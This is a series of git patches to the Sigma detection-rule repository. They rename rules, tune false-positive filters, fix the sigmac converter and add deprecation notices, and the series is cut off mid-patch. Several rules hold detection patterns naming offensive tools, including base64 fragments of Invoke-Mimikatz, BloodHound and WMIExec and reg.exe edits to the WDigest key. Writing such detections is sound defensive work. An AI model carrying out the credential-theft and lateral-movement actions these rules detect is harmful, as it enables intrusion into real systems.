@@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' + filter_empty: + Image: + - '' + - null condition: selection and not 1 of filter* falsepositives: - Legitimate administrators disabling specific event log for troubleshooting From 15713918cd538fcdc2a713b73ae39b83e7694cdf Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 8 Sep 2022 10:26:23 +0200 Subject: [PATCH 37/73] Rename --- ...> file_event_win_bloodhound_collection.yml} | 18 +++++++++--------- ...nt_win_legitimate_app_dropping_archive.yml} | 4 ++-- ..._event_win_legitimate_app_dropping_exe.yml} | 4 ++-- ...ent_win_legitimate_app_dropping_script.yml} | 4 ++-- 4 files changed, 15 insertions(+), 15 deletions(-) rename rules/windows/file_event/{file_event_bloodhound_collection.yml => file_event_win_bloodhound_collection.yml} (80%) rename rules/windows/file_event/{file_event_legitimate_app_dropping_archive.yml => file_event_win_legitimate_app_dropping_archive.yml} (97%) rename rules/windows/file_event/{file_event_legitimate_app_dropping_exe.yml => file_event_win_legitimate_app_dropping_exe.yml} (97%) rename rules/windows/file_event/{file_event_legitimate_app_dropping_script.yml => file_event_win_legitimate_app_dropping_script.yml} (97%) diff --git a/rules/windows/file_event/file_event_bloodhound_collection.yml b/rules/windows/file_event/file_event_win_bloodhound_collection.yml similarity index 80% rename from rules/windows/file_event/file_event_bloodhound_collection.yml rename to rules/windows/file_event/file_event_win_bloodhound_collection.yml index 9c0684d33..3bcde4c93 100644 --- a/rules/windows/file_event/file_event_bloodhound_collection.yml +++ b/rules/windows/file_event/file_event_win_bloodhound_collection.yml @@ -8,20 +8,20 @@ references: date: 2022/08/09 modified: 2022/08/09 tags: - - attack.discovery - - attack.t1087.001 - - attack.t1087.002 - - attack.t1482 - - attack.t1069.001 - - attack.t1069.002 - - attack.execution - - attack.t1059.001 + - attack.discovery + - attack.t1087.001 + - attack.t1087.002 + - attack.t1482 + - attack.t1069.001 + - attack.t1069.002 + - attack.execution + - attack.t1059.001 logsource: product: windows category: file_event detection: selection1: - TargetFilename|endswith: + TargetFilename|endswith: - '_BloodHound.zip' - '_computers.json' - '_containers.json' diff --git a/rules/windows/file_event/file_event_legitimate_app_dropping_archive.yml b/rules/windows/file_event/file_event_win_legitimate_app_dropping_archive.yml similarity index 97% rename from rules/windows/file_event/file_event_legitimate_app_dropping_archive.yml rename to rules/windows/file_event/file_event_win_legitimate_app_dropping_archive.yml index a50faf8b5..c03a1d896 100644 --- a/rules/windows/file_event/file_event_legitimate_app_dropping_archive.yml +++ b/rules/windows/file_event/file_event_win_legitimate_app_dropping_archive.yml @@ -48,5 +48,5 @@ falsepositives: - Unknown level: high tags: - - attack.defense_evasion - - attack.t1218 + - attack.defense_evasion + - attack.t1218 diff --git a/rules/windows/file_event/file_event_legitimate_app_dropping_exe.yml b/rules/windows/file_event/file_event_win_legitimate_app_dropping_exe.yml similarity index 97% rename from rules/windows/file_event/file_event_legitimate_app_dropping_exe.yml rename to rules/windows/file_event/file_event_win_legitimate_app_dropping_exe.yml index f9abb5613..fb41d165a 100644 --- a/rules/windows/file_event/file_event_legitimate_app_dropping_exe.yml +++ b/rules/windows/file_event/file_event_win_legitimate_app_dropping_exe.yml @@ -46,5 +46,5 @@ falsepositives: - Unknown level: high tags: - - attack.defense_evasion - - attack.t1218 + - attack.defense_evasion + - attack.t1218 diff --git a/rules/windows/file_event/file_event_legitimate_app_dropping_script.yml b/rules/windows/file_event/file_event_win_legitimate_app_dropping_script.yml similarity index 97% rename from rules/windows/file_event/file_event_legitimate_app_dropping_script.yml rename to rules/windows/file_event/file_event_win_legitimate_app_dropping_script.yml index 654cbae90..297ecd472 100644 --- a/rules/windows/file_event/file_event_legitimate_app_dropping_script.yml +++ b/rules/windows/file_event/file_event_win_legitimate_app_dropping_script.yml @@ -48,5 +48,5 @@ falsepositives: - Unknown level: high tags: - - attack.defense_evasion - - attack.t1218 + - attack.defense_evasion + - attack.t1218 From 586b1c449f2315c7015922e4df29b47145e68356 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Thu, 8 Sep 2022 16:27:56 +0200 Subject: [PATCH 38/73] fix: FP on race condition --- rules/windows/dns_query/dns_query_win_susp_ldap.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index 85396c220..accfaf6e3 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -3,6 +3,7 @@ id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e description: Detect suspicious ldap request from non Windows application status: experimental date: 2022/08/20 +modified: 2022/09/08 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -17,6 +18,8 @@ detection: filter_defender: Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' Image|endswith: '\MsMpEng.exe' + filter_unknown: + Image: '' condition: dns_request and not 1 of filter_* falsepositives: - Programs that also lookup the observed domain From 1fbd2bba4dcddfa0223a1d34dea893be6d3f9913 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Thu, 8 Sep 2022 17:57:36 +0200 Subject: [PATCH 39/73] Wrapped all-modifier result into NodeSubexpression Fixes sigmac splunk backend: Wrong conversion for |contains|all #3443 --- tools/sigma/parser/modifiers/transform.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py index 8a5267999..b66eaf9c9 100644 --- a/tools/sigma/parser/modifiers/transform.py +++ b/tools/sigma/parser/modifiers/transform.py @@ -72,7 +72,7 @@ class SigmaAllValuesModifier(SigmaTransformModifier): cond = ConditionAND() for val in self.value: cond.add(val) - return cond + return NodeSubexpression(cond) class SigmaBase64Modifier(ListOrStringModifierMixin, SigmaTransformModifier): """Encode strings with Base64""" From 57243e91e74d98801ca4b39c43c900236df350cb Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Thu, 8 Sep 2022 21:24:23 +0200 Subject: [PATCH 40/73] Sigmatools release 0.22 --- CHANGELOG.md | 20 ++++++++++++++++++++ tools/setup.py | 2 +- 2 files changed, 21 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 688155af7..f5c1ee9e5 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,26 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html) from version 0.14.0. +## 0.22 - 2022-09-08 + +### Added + +* 'windash' modifier +* DNIF backend +* Hedera backend +* StreamAlert backend +* SQLite backend can handle null values. +* Support for different Windows log sources. + +### Changed + +* Various config improvements. + +### Fixed + +* Wrapping expressions from expanding modifiers into ORed subexpressions. +* Various mapping fixes. + ## 0.21 - 2022-04-08 ### Added diff --git a/tools/setup.py b/tools/setup.py index dd05b70e6..efeceb551 100644 --- a/tools/setup.py +++ b/tools/setup.py @@ -14,7 +14,7 @@ with open(path.join(here, 'LONG_DESCRIPTION.md'), encoding='utf-8') as f: setup( name='sigmatools', - version='0.21.0', + version='0.22.0', description='Tools for the Generic Signature Format for SIEM Systems', long_description=long_description, long_description_content_type="text/markdown", From dd67c4fd73b3aeab426959dfbe32e291a6925455 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 8 Sep 2022 22:50:57 +0200 Subject: [PATCH 41/73] Dev --- ...ile_event_win_wmiexec_default_filename.yml | 21 +++++++ ...le_event_win_writing_local_admin_share.yml | 4 +- .../proc_creation_win_apt_cloudhopper.yml | 36 ++++++------ ...reation_win_base64_invoke_susp_cmdlets.yml | 44 +++++++-------- .../proc_creation_win_susp_base64_invoke.yml | 56 +++++++++---------- .../proc_creation_win_susp_reg_add.yml | 15 ++--- ...creation_win_wmic_computersystem_recon.yml | 27 +++++++++ 7 files changed, 127 insertions(+), 76 deletions(-) create mode 100644 rules/windows/file_event/file_event_win_wmiexec_default_filename.yml create mode 100644 rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml diff --git a/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml b/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml new file mode 100644 index 000000000..e65d0b42c --- /dev/null +++ b/rules/windows/file_event/file_event_win_wmiexec_default_filename.yml @@ -0,0 +1,21 @@ +title: Wmiexec Default Output File +id: 8d5aca11-22b3-4f22-b7ba-90e60533e1fb +status: experimental +description: Detects the creation of the default output filename used by the wmicexec tool +author: Nasreddine Bencherchali +date: 2022/06/02 +references: + - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/ +tags: + - attack.lateral_movement + - attack.t1047 +logsource: + category: file_event + product: windows +detection: + selection: + TargetFilename|re: '__\d{10}\.\d{1,7}' + condition: selection +falsepositives: + - Unlikely +level: critical diff --git a/rules/windows/file_event/file_event_win_writing_local_admin_share.yml b/rules/windows/file_event/file_event_win_writing_local_admin_share.yml index 380927c1f..70d5d569f 100644 --- a/rules/windows/file_event/file_event_win_writing_local_admin_share.yml +++ b/rules/windows/file_event/file_event_win_writing_local_admin_share.yml @@ -2,8 +2,8 @@ title: Writing Local Admin Share id: 4aafb0fa-bff5-4b9d-b99e-8093e659c65f status: experimental description: | - Aversaries may use to interact with a remote network share using Server Message Block (SMB). - This technique is used by post-exploitation frameworks. + Aversaries may use to interact with a remote network share using Server Message Block (SMB). + This technique is used by post-exploitation frameworks. author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share diff --git a/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml b/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml index 3cf033ac6..f59435e26 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml @@ -1,29 +1,31 @@ title: WMIExec VBS Script id: 966e4016-627f-44f7-8341-f394905c361f status: test -description: Detects suspicious file execution by wscript and cscript +description: Detects wmiexec vbs version execution by wscript or cscript author: Florian Roth references: - - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf + - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf date: 2017/04/07 -modified: 2021/11/27 +modified: 2022/09/08 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\cscript.exe' - CommandLine|contains|all: - - '.vbs' - - '/shell' - condition: selection + selection: + Image|endswith: + - '\cscript.exe' + - '\wscript.exe' + CommandLine|contains|all: + - '.vbs' + - '/shell' + condition: selection fields: - - CommandLine - - ParentCommandLine + - CommandLine + - ParentCommandLine falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.execution - - attack.g0045 - - attack.t1059.005 + - attack.execution + - attack.g0045 + - attack.t1059.005 diff --git a/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml b/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml index 7aa6fba00..a23d17ab2 100644 --- a/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml +++ b/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml @@ -4,8 +4,8 @@ status: test description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets author: pH-T related: - - id: 6385697e-9f1b-40bd-8817-f4a91f40508e - type: similar + - id: 6385697e-9f1b-40bd-8817-f4a91f40508e + type: similar date: 2022/05/31 tags: - attack.execution @@ -15,26 +15,26 @@ tags: references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - CommandLine|contains: - # Invoke-BloodHound - - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' - - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' - - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' - # Invoke-Mimikatz - - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' - - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' - - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' - # Invoke-WMIExec - - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' - - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' - - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' - condition: selection + selection: + CommandLine|contains: + # Invoke-BloodHound + - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' + - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' + - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' + # Invoke-Mimikatz + - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' + - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' + - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' + # Invoke-WMIExec + - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' + - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' + - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' + condition: selection fields: - - CommandLine + - CommandLine falsepositives: - - Unlikely -level: high \ No newline at end of file + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml b/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml index 4a1fc1312..e5b7452db 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml @@ -4,8 +4,8 @@ status: test description: Detects base64 encoded powershell 'Invoke-' call author: pH-T related: - - id: fd6e2919-3936-40c9-99db-0aa922c356f7 - type: similar + - id: fd6e2919-3936-40c9-99db-0aa922c356f7 + type: similar date: 2022/05/20 tags: - attack.execution @@ -15,32 +15,32 @@ tags: references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - CommandLine|contains: - # Invoke- - - 'SQBuAHYAbwBrAGUALQ' - - 'kAbgB2AG8AawBlAC0A' - - 'JAG4AdgBvAGsAZQAtA' - filter_other_rule: # already covered in fd6e2919-3936-40c9-99db-0aa922c356f7 - CommandLine|contains: - # Invoke-BloodHound - - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' - - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' - - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' - # Invoke-Mimikatz - - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' - - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' - - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' - # Invoke-WMIExec - - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' - - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' - - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' - condition: selection and not 1 of filter* + selection: + CommandLine|contains: + # Invoke- + - 'SQBuAHYAbwBrAGUALQ' + - 'kAbgB2AG8AawBlAC0A' + - 'JAG4AdgBvAGsAZQAtA' + filter_other_rule: # already covered in fd6e2919-3936-40c9-99db-0aa922c356f7 + CommandLine|contains: + # Invoke-BloodHound + - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA' + - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA' + - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA' + # Invoke-Mimikatz + - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA' + - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A' + - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg' + # Invoke-WMIExec + - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA' + - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw' + - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA' + condition: selection and not 1 of filter* fields: - - CommandLine + - CommandLine falsepositives: - - Unlikely -level: high \ No newline at end of file + - Unlikely +level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml index e0764e923..483e68900 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml @@ -1,13 +1,13 @@ -title: Reg Add Suspicious Path To AppDataLow +title: Reg Add Suspicious Paths id: b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 status: experimental -description: Detects when an adversary uses the 'AppDataLow' subkeys as a place to store data as seen in the URSNIF phishing campaign +description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md -author: frack113 +author: frack113, Nasreddine Bencherchali date: 2022/08/19 -modified: 2022/08/20 +modified: 2022/09/08 logsource: category: process_creation product: windows @@ -17,9 +17,10 @@ detection: - OriginalFileName: 'reg.exe' selection_path: CommandLine|contains: - - '\Software\AppDataLow\Software\Microsoft\' - - '\Software\Policies\Microsoft\Windows\OOBE' - - '\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon' + - '\AppDataLow\Software\Microsoft\' + - '\Policies\Microsoft\Windows\OOBE' + - '\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon' + - '\CurrentControlSet\Control\SecurityProviders\WDigest' condition: all of selection_* falsepositives: - Legitimate use diff --git a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml new file mode 100644 index 000000000..a78ba6588 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml @@ -0,0 +1,27 @@ +title: Suspicious Get Local Groups Information with WMIC +id: 164eda96-11b2-430b-85ff-6a265c15bf32 +status: experimental +description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model...etc. +references: + - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ +author: Nasreddine Bencherchali +date: 2022/09/08 +logsource: + product: windows + category: process_creation +detection: + selection_img: + - Image|endswith: '\wmic.exe' + - OriginalFileName: 'wmic.exe' + selection_cli: + CommandLine|contains|all: + - ' computersystem ' + - ' get ' + condition: all of selection* +falsepositives: + - Unknown +level: medium +tags: + - attack.discovery + - attack.execution + - attack.t1047 From fbc773307838da523f0458c1f97a38188d0e18f6 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 8 Sep 2022 22:52:24 +0200 Subject: [PATCH 42/73] Update proc_creation_win_susp_reg_add.yml --- .../process_creation/proc_creation_win_susp_reg_add.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml index 483e68900..c034f4a89 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml @@ -17,14 +17,15 @@ detection: - OriginalFileName: 'reg.exe' selection_path: CommandLine|contains: + # Add more suspicious registry locations below - '\AppDataLow\Software\Microsoft\' - '\Policies\Microsoft\Windows\OOBE' - '\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon' - '\CurrentControlSet\Control\SecurityProviders\WDigest' condition: all of selection_* falsepositives: - - Legitimate use -level: medium + - Rare legitimate add to registry via cli (to these locations) +level: high tags: - attack.defense_evasion - attack.t1112 From 9711afd0d627a76da7f8a23efa55029d013e4900 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 09:08:50 +0200 Subject: [PATCH 43/73] Added deprecating warning in sigmac with color --- Pipfile | 1 + tools/sigma/sigmac.py | 6 +++++- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/Pipfile b/Pipfile index 718c305f6..51a9e476b 100644 --- a/Pipfile +++ b/Pipfile @@ -21,6 +21,7 @@ progressbar2 = "~=3.47" pymisp = "~=2.4.123" PyYAML = "~=5.1" "ruamel.yaml" = "*" +termcolor = "*" [requires] python_version = "3.8" diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index e762a34d1..257ab07c0 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -1,7 +1,7 @@ #!/usr/bin/env python3 # A Sigma to SIEM converter # Copyright 2016-2017 Thomas Patzke, Florian Roth - +import os # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or @@ -37,6 +37,7 @@ import codecs import copy import time import datetime +from termcolor import colored sys.stdout = codecs.getwriter('utf-8')(sys.stdout.detach()) @@ -182,6 +183,9 @@ def main(): cmdargs = argparser.parse_args() scm = SigmaConfigurationManager() + print(colored("!!! WARNING", "red"), "sigmac is deprecated in favor of", colored("sigma-cli", "green"), "using", colored("pySigma", "green"), ". Please stop contributing backends to this tool, it will be removed in 2023.") + print() + logger = logging.getLogger(__name__) if cmdargs.debug: # pragma: no cover logging.basicConfig(filename='sigmac.log', filemode='w', level=logging.DEBUG) From 38a2e76af83c048b95e9203a9cc2664ba877a3fb Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 9 Sep 2022 10:03:33 +0200 Subject: [PATCH 44/73] fix: general filter should filter on both selections --- .../windows/file_change/file_change_win_2022_timestomping.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index cfdf05658..0a2643eaf 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml @@ -8,7 +8,7 @@ references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth date: 2022/08/12 -modified: 2022/09/05 +modified: 2022/09/09 tags: - attack.t1070.006 - attack.defense_evasion @@ -33,7 +33,7 @@ detection: - TargetFilename|endswith: - '.tmp' - '.temp' - condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter* + condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter* falsepositives: - Changes made to or by the local NTP service level: high From 6b9470f8e45ca0ea033a7599bfd7875dc587e671 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 12:24:30 +0200 Subject: [PATCH 45/73] New message as requested.\n Only displayed on full help and when no arguments is passed --- tools/sigma/sigmac.py | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 257ab07c0..8c5f2e62f 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -1,7 +1,6 @@ #!/usr/bin/env python3 # A Sigma to SIEM converter # Copyright 2016-2017 Thomas Patzke, Florian Roth -import os # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or @@ -65,6 +64,12 @@ ERR_FULL_FIELD_MATCH = 90 # Allowed fields in output allowed_fields = ["title", "id", "status", "description", "author", "references", "fields", "falsepositives", "level", "tags", "filename"] +deprecation_warning_message = colored("Sigmac will be deprecated by the end of 2022", + "red") + " in favour of sigma-cli and pySigma. Please " + colored("stop contributing backends", "red") + \ + " to this tool. Limited support is offered until the end of 2023, " \ + "especially for backends that haven't been migrated yet.\n " + + def alliter(path): for sub in path.iterdir(): if sub.name.startswith("."): @@ -97,7 +102,7 @@ class ActionBackendHelp(argparse.Action): def set_argparser(): """Sets up and parses the command line arguments for Sigmac. Returns the argparser""" - argparser = argparse.ArgumentParser(description="Convert Sigma rules into SIEM signatures.") + argparser = argparse.ArgumentParser(description="Convert Sigma rules into SIEM signatures.\n" + deprecation_warning_message, formatter_class=argparse.RawTextHelpFormatter) argparser.add_argument("--recurse", "-r", action="store_true", help="Use directory as input (recurse into subdirectories is not implemented yet)") argparser.add_argument("--filter", "-f", help=""" Define comma-separated filters that must match (AND-linked) to rule to be processed. @@ -183,9 +188,6 @@ def main(): cmdargs = argparser.parse_args() scm = SigmaConfigurationManager() - print(colored("!!! WARNING", "red"), "sigmac is deprecated in favor of", colored("sigma-cli", "green"), "using", colored("pySigma", "green"), ". Please stop contributing backends to this tool, it will be removed in 2023.") - print() - logger = logging.getLogger(__name__) if cmdargs.debug: # pragma: no cover logging.basicConfig(filename='sigmac.log', filemode='w', level=logging.DEBUG) @@ -205,6 +207,7 @@ def main(): sys.exit(0) elif len(cmdargs.inputs) == 0: print("Nothing to do!") + print(deprecation_warning_message) argparser.print_usage() sys.exit(0) From 607521f6bd6a25eea3246d27876721164c1f420b Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 12:33:00 +0200 Subject: [PATCH 46/73] Added depcration notice in README page --- tools/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/README.md b/tools/README.md index 5742d6077..946b38aa8 100644 --- a/tools/README.md +++ b/tools/README.md @@ -8,6 +8,8 @@ This folder contains libraries and the following command line tools: # Sigmac +Sigmac will be deprecated by the end of 2022 in favour of [sigma-cli](https://github.com/SigmaHQ/sigma-cli) and [pySigma](https://github.com/SigmaHQ/pySigma). Please stop contributing backends to this tool. Limited support is offered until the end of 2023, especially for backends that haven't been migrated yet. + The Sigmac is one of the most important files, as this is what sets the correct fields that your backend/database will use after being translated from the (original) log source's field names. Please read below to understand how a SIGMAC is constructed. Additionally, see [Choosing the Right Sigmac](#choosing-the-right-sigmac) for an idea of which file and command line options (if applicable) that will best suite your environment. From 43e0d4fe6a1c984a4e441f42f5914a5f27b6c720 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Fri, 9 Sep 2022 13:51:20 +0200 Subject: [PATCH 47/73] fix: FP with windows defender --- .../process_access/proc_access_win_hack_sysmonente.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml index e999257ec..9b3776bcc 100644 --- a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml +++ b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml @@ -8,6 +8,7 @@ references: - https://github.com/codewhitesec/SysmonEnte/ - https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png date: 2022/09/07 +modified: 2022/09/09 tags: - attack.defense_evasion - attack.t1562.002 @@ -22,9 +23,12 @@ detection: SourceImage|startswith: - 'C:\Program Files' - 'C:\Windows\System32\' + filter_msdefender: + SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + SourceImage|endswith: '\MsMpEng.exe' selection_calltrace: CallTrace: 'Ente' - condition: ( selection_1 and not filter_1 ) or selection_calltrace + condition: ( selection_1 and not 1 of filter_* ) or selection_calltrace falsepositives: - Unknown level: high From 70f9ff61ca3c1d78f101fa84ee8264d41f57e9b3 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 15:02:31 +0200 Subject: [PATCH 48/73] Big Update --- .../posh_ps_root_certificate_installed.yml | 8 +-- .../proc_creation_win_apt_hurricane_panda.yml | 30 +++++------ .../proc_creation_win_apt_wocao.yml | 6 +-- ...reation_win_email_exfil_via_powershell.yml | 30 +++++++++++ ...reation_win_import_cert_susp_locations.yml | 32 ++++++++++++ ...eation_win_mal_hermetic_wiper_activity.yml | 38 +++++++------- ..._creation_win_malware_conti_shadowcopy.yml | 6 +-- .../proc_creation_win_malware_notpetya.yml | 50 +++++++++---------- .../proc_creation_win_net_add_local_user.yml | 26 ++++++++++ ..._win_net_default_accounts_manipulation.yml | 5 ++ .../proc_creation_win_net_recon.yml | 8 +-- ...proc_creation_win_netsh_allow_port_rdp.yml | 16 +++--- .../proc_creation_win_node_abuse.yml | 34 +++++++++++++ ...reation_win_redirect_local_admin_share.yml | 